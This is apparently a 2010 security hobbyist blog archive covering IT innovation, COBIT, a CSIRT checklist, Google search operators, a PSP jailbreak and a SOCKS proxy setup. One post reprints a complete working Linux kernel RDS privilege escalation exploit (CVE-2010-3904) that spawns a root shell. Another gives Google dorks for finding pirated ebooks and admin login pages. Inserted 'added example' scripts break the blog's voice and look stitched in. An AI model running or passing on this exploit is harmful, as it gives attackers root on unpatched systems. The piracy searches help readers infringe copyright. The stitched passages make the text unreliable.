Tuesday, November 23, 2010

Stop Killing Innovation

I read an interesting post by Richard Bejtlich about "innovation". I decided to share his post here; enjoy reading.

I hear and read a lot about how IT is supposed to innovate to enable "the business." Anytime I see "IT" in one part of a sentence and "the business" in another, a little part of me dies. Somewhere there is a Nirvana where "thought leaders" understand that there is no business without IT, that IT is as part of the business as the sales person or factory worker or janitor, and that IT would be better off not constantly justifying its existence to "the business." But I digress.


I want to address the "innovation" issue in this post. CIO magazine recently published an interview with Vinnie Mirchandani titled Taking Business Risks With Your IT Budget. I liked what Mr Mirchandani had to say, although I'm going to omit his multiple references to "cloud." Instead, consider how he sees innovation in IT:


More [CIOs] want to be [innovators], but organizations don’t let them...


In the 1980s, we talked about IT as a competitive advantage... In the 1990s, we didn’t hear much of that at all, and IT started reporting to CFOs. In the early 2000s, the CFO made IT a compliance function for auditing and security.


We’ve beaten the innovation out of CIOs at many companies. We want them to be risk mitigators, not innovators. People are afraid to be associated with any failure. They buy IT from vendors that are safe choices. They know they’re overspending, yet they do it anyway...


Mr Mirchandani doesn't say this, but he could have also mentioned that many managers expect CIOs to be "productivity engines," meaning they inherently shrink their budget every year. This drives cost reduction as the primary goal for an IT shop -- not innovation. It's like expecting the business development team to concentrate on decreasing the amount of money spent per new customer acquired, while not caring so much on the quantity or quality of the new customers -- if any!


So what to do?


The best thing they could do is get out from under the CFO. Go to your CEO and say, “I want to report to you.” Make sure the CFO doesn’t stand in the way. Some CIOs will get fired for doing that. Others will get a chance...


Cost pressure isn't limited to those who only report to the CFO, but he doesn't address that issue.


The shocking thing about corporate IT is that without realizing it, 85 percent to 90 percent of the IT spend is with a vendor, including outsourcers and the staff you buy from them...


When you’re spending 90 percent of your money with a vendor, you have only a sliver left for [internal] talent — yet it’s with your own internal talent that you can innovate. There’s very little left for CIOs to innovate with.


The more progressive CIOs are saying they’ve overdone it with outsourcing and are starting to hire their own enterprise architects and business analysts and other strategic resources.


To me this is the crux of the issue. Businesses cannot outsource innovation. Businesses can crush innovation pretty easily though.


I found one comment he made about the cloud to be very interesting:


CIOs resist it. It’s not secure, they say. It’s not always available. CIOs say cloud vendors go down too often.


I know CIOs who haven’t run a full disaster-recovery drill for years and turn around and say that the cloud isn’t production-ready.


So, my message to readers is this: if cost-out, five nines uptime, outsourced workforces, and other failed strategies are your goal, forget innovation. If you want innovation to thrive, try considering the alternatives.


Source: Richard Bejtlich's blog (TaoSecurity)
Reference: CIO - Taking Business Risks With Your IT Budget

Friday, November 12, 2010

COBIT-Framework: Basic Principle

COBIT is an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. COBIT enables clear policy development and good practice for IT control throughout organizations. COBIT emphasizes regulatory compliance, helps organizations to increase the value attained from IT, enables alignment and simplifies implementation of the COBIT framework.

Business orientation is the main theme of COBIT. It is designed not only to be employed by IT service providers, users and auditors, but also, and more importantly, to provide comprehensive guidance for management and business process owners. The COBIT framework is based on the following principle:

"To provide the information that the enterprise requires to achieve its objectives, the enterprise needs to invest in and manage and control IT resources using a structured set of processes to provide the services that deliver the required enterprise information."

Friday, October 22, 2010

Review for Network Security The Complete Reference

I've been looking for the "Onion Methodology" for the past few weeks. Network Security: The Complete Reference has it.

"The Onion Model of Defense is a layered strategy, sometimes referred to as Defense in Depth. This model addresses the contingency of a perimeter security breach occurring."

"Consider what happens when an invader picks the front door lock or breaks a window to gain entry to a house? The homeowner may hide cash in a drawer and may store valuable jewels in a safe. These protective mechanisms address the contingency that the perimeter security fails. They also address the prospect of an inside job. The same principles apply to network security. What happens when an attacker gets past the firewall? What happens when a trusted insider, like an employee or a contractor, abuse their privileges? The onion model addresses these contingencies."

Overall, the book is a comprehensive resource that provides all the information necessary to formulate strategies for obtaining and implementing a network security program. A five-star book.

Thursday, October 21, 2010

Linux RDS Protocol Local Privilege Escalation

/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg 
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/utsname.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <unistd.h>

#define RECVPORT 5555 
#define SENDPORT 6666

int prep_sock(int port)
{
 
 int s, ret;
 struct sockaddr_in addr;

 s = socket(PF_RDS, SOCK_SEQPACKET, 0);

 if(s < 0) {
  printf("[*] Could not open socket.\n");
  exit(-1);
 }
 
 memset(&addr, 0, sizeof(addr));

 addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 addr.sin_family = AF_INET;
 addr.sin_port = htons(port);

 ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

 if(ret < 0) {
  printf("[*] Could not bind socket.\n");
  exit(-1);
 }

 return s;

}

void get_message(unsigned long address, int sock)
{

 recvfrom(sock, (void *)address, sizeof(void *), 0,
   NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
 
 int size, ret;
 struct sockaddr_in recvaddr;
 struct msghdr msg;
 struct iovec iov;
 unsigned long buf;
 
 memset(&recvaddr, 0, sizeof(recvaddr));

 size = sizeof(recvaddr);

 recvaddr.sin_port = htons(RECVPORT);
 recvaddr.sin_family = AF_INET;
 recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

 memset(&msg, 0, sizeof(msg));
 
 msg.msg_name = &recvaddr;
 msg.msg_namelen = sizeof(recvaddr);
 msg.msg_iovlen = 1;
 
 buf = value;

 iov.iov_len = sizeof(buf);
 iov.iov_base = &buf;

 msg.msg_iov = &iov;

 ret = sendmsg(sock, &msg, 0);
 if(ret < 0) {
  printf("[*] Something went wrong sending.\n");
  exit(-1);
 }
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

 if(!fork()) {
   sleep(1);
   send_message(value, sendsock);
   exit(1);
 }
 else {
  get_message(addr, recvsock);
  wait(NULL);
 }

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

 commit_creds(prepare_kernel_cred(0));
 return -1; 

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 struct utsname ver;
 int ret;
 int rep = 0;
 int oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   goto fallback;
  oldstyle = 1;
 }

repeat:
 ret = 0;
 while(ret != EOF) {
  if (!oldstyle)
   ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  else {
   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S."))
     continue;
    p = strrchr(sname, '_');
    if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_')
      p--;
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
   fclose(f);
   return addr;
  }
 }

 fclose(f);
 if (rep)
  return 0;
fallback:
 /* didn't find the symbol, let's retry with the System.map
    dedicated to the pointlessness of Russell Coker's SELinux
    test machine (why does he keep upgrading the kernel if
    "all necessary security can be provided by SE Linux"?)
 */
 uname(&ver);
 if (strncmp(ver.release, "2.6", 3))
  oldstyle = 1;
 sprintf(sname, "/boot/System.map-%s", ver.release);
 f = fopen(sname, "r");
 if (f == NULL)
  return 0;
 rep = 1;
 goto repeat;
}

int main(int argc, char * argv[])
{
 unsigned long sec_ops, def_ops, cap_ptrace, target;
 int sendsock, recvsock;
 struct utsname ver;

 printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
 printf("[*] by Dan Rosenberg\n");

 uname(&ver);

 if(strncmp(ver.release, "2.6.3", 5)) {
  printf("[*] Your kernel is not vulnerable.\n");
  return -1;
 } 

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 sec_ops = get_kernel_sym("security_ops");
 def_ops = get_kernel_sym("default_security_ops");
 cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

 if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
  printf("[*] Failed to resolve kernel symbols.\n");
  return -1;
 }

 /* Calculate target */
 target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));

 sendsock = prep_sock(SENDPORT);
 recvsock = prep_sock(RECVPORT);

 /* Reset security ops */
 printf("[*] Overwriting security ops...\n");
 write_to_mem(sec_ops, def_ops, sendsock, recvsock);

 /* Overwrite ptrace_traceme security op fptr */
 printf("[*] Overwriting function pointer...\n");
 write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);

 /* Trigger the payload */
 printf("[*] Triggering payload...\n");
 ptrace(PTRACE_TRACEME, 1, NULL, NULL);
 
 /* Restore the ptrace_traceme security op */
 printf("[*] Restoring function pointer...\n");
 write_to_mem(target, cap_ptrace, sendsock, recvsock);

 if(getuid()) {
  printf("[*] Exploit failed to get root.\n");
  return -1;
 }

 printf("[*] Got root!\n");
 execl("/bin/sh", "sh", NULL);

}
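The header comment above makes the defender's point: the bug is only reachable if the rds protocol module can be loaded, and most systems never need it. The script below is an added example, not part of the original exploit or of this post. It checks a module list in /proc/modules format for rds and prints the modprobe.d stanza that vendor advisories for this issue recommended, "install rds /bin/true", which turns any load of the module by name or alias into a no-op (a plain "blacklist" line only stops alias-based autoloading and does not block an explicit load). The sample module list embedded in it is constructed, and the file name disable-rds.conf is an assumed choice.

```shell
#!/bin/sh
# Added example (not from the original post or exploit): check whether the
# rds kernel module is loaded and show how to keep it from being loaded.

# Return 0 when the module list in file $1 (the format of /proc/modules:
# one "name size refcount ..." line per loaded module) shows rds loaded.
rds_loaded_in() {
    grep -q '^rds ' "$1"
}

# Print the modprobe.d stanza that makes every attempt to load rds a no-op.
rds_blacklist_conf() {
    printf 'install rds /bin/true\n'
}

# Report on the module list passed as $1 (defaults to the live /proc/modules).
report_rds_status() {
    modules="${1:-/proc/modules}"
    if [ ! -r "$modules" ]; then
        echo "cannot read $modules"
        return 0
    fi
    if rds_loaded_in "$modules"; then
        echo "rds is loaded according to $modules."
        echo "Unload it (rmmod rds) and persist the block by writing this line"
        echo "to /etc/modprobe.d/disable-rds.conf (assumed file name):"
        echo "  $(rds_blacklist_conf)"
    else
        echo "rds is not loaded according to $modules."
    fi
}

# Constructed sample in /proc/modules format so the script demonstrates the
# "loaded" branch offline; pass a path (e.g. /proc/modules) to check a host.
SAMPLE_MODULES="$(mktemp)"
printf 'rds 176512 0 - Live 0xffffffffa0120000\ne1000 120000 0 - Live 0xffffffffa0000000\n' > "$SAMPLE_MODULES"
report_rds_status "${1:-$SAMPLE_MODULES}"
rm -f "$SAMPLE_MODULES"
```

Run it with no argument to see the constructed sample, or with /proc/modules to check the machine it runs on; the stanza it prints is the persistent control, and the same check belongs in any baseline audit of which protocol families a host is allowed to bring up.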

Security Incident Response Team: CSIRT: Getting Started

Action List for Developing a Computer Security Incident Response Team (CSIRT)
  1. Identify stakeholders and participants.
  2. Obtain management support and sponsorship.
  3. Develop a CSIRT project plan.
  4. Gather information.
  5. Identify the CSIRT constituency.
  6. Define the CSIRT mission.
  7. Secure funding for CSIRT operations.
  8. Decide on the range and level of services the CSIRT will offer.
  9. Determine the CSIRT reporting structure, authority, and organizational model.
  10. Identify required resources such as staff, equipment, and infrastructure.
  11. Define interactions and interfaces.
  12. Define roles, responsibilities, and the corresponding authority.
  13. Document the workflow.
  14. Develop policies and corresponding procedures.
  15. Create an implementation plan and solicit feedback.
  16. Announce the CSIRT when it becomes operational.
  17. Define methods for evaluating the performance of the CSIRT.
  18. Have a backup plan for every element of the CSIRT.
  19. Be flexible.

Tuesday, October 5, 2010

Google Dork: eBook

Google: -inurl:htm -inurl:html intitle:"index of" +("/ebooks"|"/book") +(chm|pdf|zip)

What does all of this mean? The -inurl:htm and -inurl:html terms remove regular web pages so that only directory index pages remain. Requiring "index of" in the title does the same. The pipe ( | ) tells Google to look for one thing OR another; here we are telling Google to look for book or ebook directories, and we have listed several common ebook formats (chm, pdf, zip).

If you would like to look for a particular author or title just tack it to the end of your search.

Google: -inurl:htm -inurl:html intitle:"index of" +("/ebooks"|"/book") +(chm|pdf|zip) +"o'reilly"

This uses the same idea but attempts to focus on directories that contain O’Reilly stuff. It’s not perfect, but it’s better than paying.

Google Dork

Google Calc:

Google can also be used as a calculator. These are the calculator operators you can use to perform arithmetic in Google:

+ , - , * , / , % of , ^

Go to www.google.com and type the calculation you want to perform into the input box, for example 8-5, and the result is returned. The other calculator operators work the same way.

+ and - are not only for arithmetic; you can also use them to narrow down a search. Searching for hacking + ebooks finds pages about both hacking and ebooks, but gives more weight to ebooks than to hacking.
Search for hacking - cracking to exclude cracking-related sites and information while searching for hacking.

Searching for a phrase?
If you are searching for a phrase, enclose it in quotes; it does not matter whether you use single or double quotes.
"incognito" or 'incognito'

Wildcard search:
You can use the asterisk operator for wildcard searches; Google then finds possible matches for one or more words within the quoted phrase.
"adm*"

Some other Google operators:
Site:

This operator restricts the search to a single website. hacking info site:www.microsoft.com This query narrows the search to hacking-related information on the site www.microsoft.com.

Num range:
10..20
When this query is given to Google, it searches for a number in the range 10 to 20.

Link:
link:www.microsoft.com
This query displays the pages that link to the site www.microsoft.com.

Related:
related:www.warez.com
Websites whose content looks similar or related to the given site are displayed as the result of this query.

Cache:
cache:www.ethicaluniversity.com
The cache operator can also serve as a rough proxy: Google returns its stored copy of the page, so it sits between you and the original site. Note that images and other embedded resources in the cached page are still fetched from the original server unless you choose the text-only version.

Site:
site:www.ethicaluniversity.com
The site operator can be used to search everything that has been indexed from a website. This reveals a lot about which of the site's content is sitting in Google's index.

allinanchor: The link and allinanchor operators do much the same thing; allinanchor searches for keywords enclosed in the anchor text of links pointing to a page. allinanchor:login

Stocks:
stocks:icici
Using the stocks operator, you can get current stock details.

Safesearch:
When SafeSearch is turned on, sites and web pages containing pornography and explicit sexual content are blocked from search results. Many Google users prefer not to have adult sites included in their search results. Google's SafeSearch screens for sites that contain this type of content and eliminates them from search results. safesearch: keygens + cracks

Phonebook:
This operator lets you search the phone numbers that Google holds for quick reference.
phonebook: Disney CA

Info:
This operator cannot be combined with other Google operators.
It shows the information Google holds about your site.
info:www.yahoo.com

Filetype:
You can narrow down your search with the filetype operator if you are searching for a file of a specific type.
filetype:pdf "Networks"
This fetches PDF documents or e-books related to networking.

Google currently supports the following filetypes:
txt, doc, pdf, ps, wk1, wk2, wk3, wk4, wk5, wki, wks, wku, lwp, mw, xls, ppt, wks, wps, wdb, wri, rtf, swf, ans, xml, cpp, java, torrent and so on.

Ext:
This is similar to the filetype operator. ext:pdf "Networks"

Define:
If you want to use Google like a dictionary to look up the meaning or definition of a word, use the define operator. define:hacking

allintext:
This is somewhat similar to the normal search most people do: you search for a specific term in Google, and you can use more than one word enclosed in quotes. allintext:defaced mirror

intitle:
This operator searches the text enclosed in the page's title tag. intitle:"admin login"

allintitle:
You can use only one argument with the intitle operator, whereas you can pass more than one to the allintitle operator. allintitle:"admin login" "webmaster login" "administrator"

Location:
You can search content only from websites of a selected country by specifying the location with the location operator.
inurl:admin.asp location:india
This fetches pages that contain admin.asp in their URL and are from India.

Source:
You can narrow down the search by restricting the source. You can specify the source as a popular e-zine, article or even a publisher.
"Network Security" source:tata mcgraw hill
This fetches results for "Network Security" related topics published by Tata McGraw Hill.

Weather:
weather:chennai This returns the weather in Chennai. Likewise you can look up your own city.

Conversions:
You can convert to or from degrees and radians using Google.

Number Bases

in hex

in binary

in octal

in decimal

Speed, time and distance conversions

20mph in kph

2 month in minutes

420 kelvin in celsius

5 fahrenheit in celsius

Wednesday, September 8, 2010

PSP slim Hack's

Procedure for firmware 5.03 or below
1. Update the firmware to version 5.03. If this firmware is already installed, skip this step.
2. Download and install official firmware version 5.03.
3. Download and install chickHEN R2.
4. Download and install PSPIdent v0.4 or later.
5. Continue based on which motherboard you have:

   a. For TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 motherboards:
      i. Install custom firmware. The most current are:
         - 5.00 M33-6
         - 5.50 GEN-D3

   b. For TA-088v3 (partially hackable) motherboards:
      i. Install partial custom firmware ONLY. The most current are:
         - CFWEnabler 3.60
         - 5.03 GEN-C

Procedure for firmware above 5.03:
1. Buy or make a Pandora battery and a Magic Memory Stick.
2. Without the Pandora battery inserted, insert the Magic Memory Stick.
3. Hold the "L" shoulder button and insert the Pandora battery.
4. The green LED near the power switch should light up.
5. The onscreen instructions should appear.
6. Release the "L" shoulder button.

NOTE: If onscreen instructions for installing 5.00 M33-4 appear, your PSP is COMPLETELY HACKABLE. If nothing appears, we must assume your PSP is NOT HACKABLE. Follow the remaining steps accordingly.

   a. TA-085, TA-085v2, TA-088v1, TA-088v2 or TA-090v1 (completely hackable) motherboards:
      i. Follow the onscreen instructions to install 5.00 M33-4.
      ii. Ensure M33-4 is completely installed.
      iii. Install 5.50 GEN-D3 or 5.00 M33-6 through Hellcat's Recovery Flasher.

   b. TA-088v3 (not hackable):
      Sit and wait.

Thursday, June 17, 2010

Google Chrome socks5


1. Paste the following into a file and save it with the .cap extension, e.g. my-socks.cap:
function FindProxyForURL(url, host) { return "SOCKS5 localhost:8080"; }

2. Configure Proxy Switchy with the Auto config URL pointing at the file you saved, e.g. file:///D:/security/proxy-tunnel/ucsc-tunnel.cap

3. Done
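The one-liner in step 1 sends every request through the tunnel. The PAC script below is an added example, not part of the original post: written in the same PAC dialect of JavaScript, it routes only hosts under two assumed placeholder domain suffixes through the SOCKS5 proxy and sends everything else DIRECT. For the tunneled hosts it deliberately lists no DIRECT fallback after the proxy, so if the tunnel is down those connections fail instead of quietly leaving the machine unproxied. The suffixes are assumptions; the proxy string is the one from step 1.

```javascript
// Added example PAC script (not from the original post). The browser's PAC
// engine calls FindProxyForURL(url, host) for every request and expects a
// proxy list such as "SOCKS5 host:port" or "DIRECT" in return.

// Assumed placeholder domains that must only be reached through the tunnel.
var TUNNELED_SUFFIXES = [".example.internal", ".corp.example"];

// Same proxy string as the one-liner in step 1.
var SOCKS_PROXY = "SOCKS5 localhost:8080";

// True when host is the bare domain of suffix or a subdomain of it.
// Uses only slice/charAt so it runs in older PAC engines as well.
function hostMatchesSuffix(host, suffix) {
  var h = host.toLowerCase();
  var bare = suffix.charAt(0) === "." ? suffix.slice(1) : suffix;
  if (h === bare) return true;
  return h.length > suffix.length &&
         h.slice(h.length - suffix.length) === suffix;
}

function FindProxyForURL(url, host) {
  for (var i = 0; i < TUNNELED_SUFFIXES.length; i++) {
    if (hostMatchesSuffix(host, TUNNELED_SUFFIXES[i])) {
      // No "; DIRECT" after the proxy: when the tunnel is down these
      // requests fail rather than silently going out unproxied.
      return SOCKS_PROXY;
    }
  }
  // Everything else bypasses the tunnel.
  return "DIRECT";
}
```

Save it with the same extension and point the Auto config URL from step 2 at it, exactly as with the one-liner; the suffix match is on the host, not the URL, so "notexample.internal" does not match ".example.internal".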

Tuesday, May 25, 2010

SECURITY METRICS - Attack Surface Metrics

Operational security metrics are the metrics we are most familiar with in our lives. When we measure the height, width, or length of an object we are using an operational metric. When we write the date, have a birthday, or ask the score of a game we are using operational metrics. An operational metric is a constant measurement that informs us of a factual count in relation to the physical world we live in.

They are operational because they are numbers we can work with consistently from day to day and person to person. It is difficult to work with relative or inconsistent measurements like choosing a specific hue of yellow to paint a room, starting work at sunrise, having the right flavor of strawberry for a milkshake, or preparing for the next threat to affect your organization’s profits because the factors have many variables which are biased or frequently changing between people, regions, customs, and locations.

For this reason, many professions attempt to standardize things like flavors, colors, and work hours. This is done through reductionism, the process of finding the elements that make up such things and building them back up by quantifying those elements. This way, colors become frequencies, work hours become hours and minutes, flavors become chemical compounds, and an attack surface becomes porosity, controls, and limitations. So we can now quantify the attack surface as "ravs".

Details at ISECOM

Saturday, May 22, 2010

PHP Security Course

PHP Security Course – Advanced PHP Auditing at Source and Bytecode level

Two weeks after the Month of PHP Security closes Stefan Esser will teach an advanced PHP security course at the SyScan Singapore security conference.

The course will cover advanced methods and techniques for PHP applications audits at source code and at bytecode level. The students will get to know the most common PHP security problems and how to find them at source code and bytecode level. Throughout the course several free and open source software tools will be introduced and used in order to visualize application structure, find security problems with static and dynamic analysis on source code and bytecode level and also to break PHP bytecode encryption.

THC and The Nokia Rom Images

THC and The Nokia Rom Images - 2006-09-06

In mid july Nokia charged THC with copyright infringement and threatened with a lawsuit. THC took down thc.org to prevent further cost and a legal disaster.

A month earlier THC discovered significant security flaws in Nokia's operating system. To prove it, THC published ROM images of 3 phones. THC did not publish the source code or tools, but one thing became apparent: to extract the ROM images, core security features had to be breached. THC's ability to load kernel modules and gain access to the core of the OS (including the GSM stack) was something Nokia did not like.

At the time of the release THC was not aware of any copyright-protected material inside the ROMs. The question has to be asked whether Nokia chose the right method by threatening THC with a lawsuit, or whether an email could have achieved the same. Was their concern really copyright infringement? The software in the ROM images could not be used, not be ported and not be run on any other mobile phone. In addition, all the software is already available on every phone, phones that are given away by the mobile operators for 1 Euro or sometimes even for free. So if everyone has access to the software anyway, what is the point in threatening THC? What was their real intent? We might never find out. But what we do know is that they managed to silence THC for a month.

Is this professional practice? We do not know. It is certainly the practice that Nokia chose. We also know that no attempt was made by Nokia to inquire about the security vulnerability. We also know that Nokia did not provide any updates for their customers.

Making sure that the hardware we purchase is secure is not a crime. In fact, taking a look at what we buy should be our duty. We should not trust big corporations who claim in TV advertisements how secure and safe our data is. We have to test it and prove them wrong whenever we can.

In fact researchers should demand that manufacturers like Nokia provide full documentation of their hardware. The buyer becomes the owner of the mobile phone and thus has the right to know how to program the hardware. Nokia does not provide any such information. Free software or a different operating system cannot be used because of limited access to documentation. This is a classic example of a hardware giant allowing only its own software to be used. This is what some people would consider a monopoly and an abuse of power.

THC is deeply concerned that Nokia did not choose the diplomatic route.

Source: http://freeworld.thc.org/thc-rom/

Friday, May 21, 2010

Something to quote

"Software is like sex. It's better when it's free." -- Linus Torvalds
"A chain is only as strong as its weakest link." -- Charles A. Lindberg
"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK
"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra
"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog
"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle
"There are always errors in real data." -- The AWK Programming Language
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous

Monday, April 26, 2010

Operation Aurora

Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009.[1] The attack was first publicly disclosed by Google on January 12, 2010, in a blog post.[2] In the blog post, Google said the attack originated in China.

The attack has been aimed at dozens of other organizations, of which Adobe Systems,[3] Juniper Networks[4] and Rackspace[5] have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman and Dow Chemical[6] were also among the targets.

As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices.[2] Official Chinese media responded stating that the incident is part of a U.S. government conspiracy.[7]

The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee. Research by McAfee Labs discovered that “Aurora” was part of the file path on the attacker’s machine that was included in two of the malware binaries McAfee said were associated with the attack. "We believe the name was the internal name the attacker(s) gave to this operation," McAfee Chief Technology Officer George Kurtz said in a blog post.[8]

According to McAfee, the primary goal of the attack was to gain access to and potentially modify source code repositories at these high tech, security and defense contractor companies. “[The SCMs] were wide open,” says Dmitri Alperovitch, McAfee’s vice president for threat research. “No one ever thought about securing them, yet these were the crown jewels of most of these companies in many ways — much more valuable than any financial or personally identifiable data that they may have and spend so much time and effort protecting."[9]

Source: Wikipedia

Monday, March 22, 2010

Forget ROI and risk. Consider competitive advantage

1. "ROI-centric discussion"

Security person: Hello boss. We need to implement our security program because it has a ROI of $1 million dollars.
Boss: You mean if we adopt your program we're going to earn $1 million dollars?
Security person: No, we'll save $1 million.
Boss: Get out of my office. Come back after you've taken a finance class.



2. "Risk-centric discussion"

Security person: Hello boss. We need to implement our security program because I've calculated our risk to be 1.35.
Boss: What does that mean?
Security guy: Hmm, ok I'll leave now.



3. "Competitiveness discussion"

Security person: Hello boss. We need to implement our security program because it will provide a competitive advantage to our businesses.
Boss: That's a new one. Tell me more.
Security person: We have adversaries who try to steal, and sometimes do steal, our data.
Boss: So what. Isn't it just World of Warcraft credentials?
Security person: Our adversaries steal intellectual property like design plans, pricing data, negotiation strategies, and other information which means they might understand our business as well as we do.
Boss: Is that true? You mean we could lose deals because our products are copied, our bids undercut, our positions already known? I wonder if that's why we lost a deal to MegaCorp last month...
Security person: Now that you mention it, here is a report on suspicious computer activity involving MegaCorp last week. Our team managed to interdict their theft attempt, but in the future we'd like to be able to detect and respond faster, as well as make it more difficult for the adversary to have a chance to steal our information.
Boss: Now you're talking. Sit down, let's discuss this.



"Notice what happened here. Magazines written for CIOs, CTOs, CISOs, and so on constantly advocate "speaking the language of the business." Unfortunately this "language" has been assumed to be finance. As a result security people tried to shoehorn their projects into ROI or ROSI, to laughable results.

As we've seen during the last few years, "risk" has turned out to be a dead end too. The numbers mean nothing. Even if you could somehow measure risk, it's easy enough for managers to accept a higher level of risk than the security manager.

Competitiveness, on the other hand, is everything to business people. They are constantly looking for an edge. In a tight economy, gaining an advantage over the competition could mean the difference between thriving or going out of business.


Notice that discussing competitiveness also avoids the death spiral associated with ROI discussions: cost. When conversation is ROI-centric, digital security is perceived as being a loss prevention exercise and a cost center. IT in general is often seen in this light. Don't dump money in a cost center -- cut spending instead!


When you turn the focus on the adversary -- you are threat-centric -- and discuss how he is trying to beat you and how you can beat him, you are likely to strike a primal chord in the mind of the business person. The executive is likely to wonder "what else can we do to give us a competitive advantage?" Suddenly the digital security shop is seen as a business partner in a common fight with the competition, not a cost center dragging down the "productive" elements of the business.

This isn't a new idea, but it's largely absent in the mindshare of digital security professionals. (If anyone has an ACM account I'd like to read Using information security to achieve competitive advantage by Charles Cresson Wood, 1991.) In addition to mentioning ROI and risk, it's important to remember that compliance is the other driver that is likely to justify funding. However, I believe we are more likely to see security shops spending resources explaining why their current activities meet regulatory requirements. I doubt new programs are going to be created to meet compliance needs, since compliance is basically a ten-year-old justification at this point."

- source taosecurity

Wednesday, March 10, 2010

Advice for Academic Researchers

Quoted from the TaoSecurity blog:

A blog and book reader emailed the following question:

I am an info sec undergrad and have been granted a scholarship to continue my studies towards a phd with the promise of DoD service at the other end. It is critical for me to research and select the most important area of security from the Defense Department's perspective.

My question to you is this: Drawing upon your knowledge, what specific area(s) of information security do you feel will be most critical in the next several years (especially in the eyes of the Dept. of Defense)?


I post this question because I'm sure blog readers will contribute interesting comments.

For my part, I'm really interested in the following: characterizing network traffic. In other words, develop tools and techniques to describe what is happening on the network. (I'm sure a few commercial vendors think they are doing this already, but nothing approaches the level that we really need.)

Without understanding what is happening, we can't decide if the activity is normal, suspicious, or malicious. Current approaches are far too primitive and limited. This work is not as "shiny" as developing a new detection algorithm, but getting back to basics is the sort of approach that could survive in a research environment.